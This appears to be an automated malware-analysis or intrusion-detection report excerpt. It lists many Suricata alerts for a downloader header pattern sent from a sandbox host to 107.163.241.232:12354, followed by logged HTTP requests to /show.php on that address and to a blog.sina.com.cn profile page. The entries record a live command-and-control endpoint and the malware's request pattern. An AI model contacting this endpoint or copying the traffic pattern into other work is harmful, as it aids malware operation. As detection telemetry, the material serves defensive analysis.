Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:61066 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62888 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:65323 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49405 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:63787 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:53356 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49512 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:54771 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:56879 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:57630 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:54925 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:57670 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51247 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:53222 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:63901 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51248 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:58364 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:56860 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:58692 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:65257 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:53912 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:55293 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:59400 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62665 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:56201 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:59396 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:55955 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:63653 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:60510 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:56130 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51021 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50965 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:53634 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51931 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50872 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:56129 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51164 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51202 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:60698 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51783 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51515 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:56486 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51717 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:63828 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50927 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:61400 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:53093 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51790 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:60344 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50973 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:54065 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:60331 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:54740 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51554 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:52745 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:53844 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:57231 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51555 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:60263 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51724 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50623 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50885 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51005 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:54937 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:55816 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50945 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:54806 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51156 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:54328 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:57363 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51499 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:63468 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:63781 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:54765 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:56123 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:57028 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:60992 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51441 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:57843 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:63891 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50865 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:57675 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50923 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:53303 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51241 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51185 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50897 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51701 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:60382 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:60528 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51530 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:56120 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:52929 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:63372 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:55881 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:56326 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51321 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:60163 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:63851 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51302 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51037 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:58209 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51307 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:61625 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:52813 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50984 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:56117 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:56954 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:63392 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:60797 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51733 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:64077 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50957 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:55003 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:56098 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:60939 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51168 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:58049 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50850 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51353 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50939 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:55032 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50987 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51165 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:61156 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:60660 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50966 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:54492 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51581 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:55298 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51338 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51225 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51685 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:54598 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51012 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50896 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51256 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50838 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:56767 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50998 -> 107.163.241.232:12354

Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
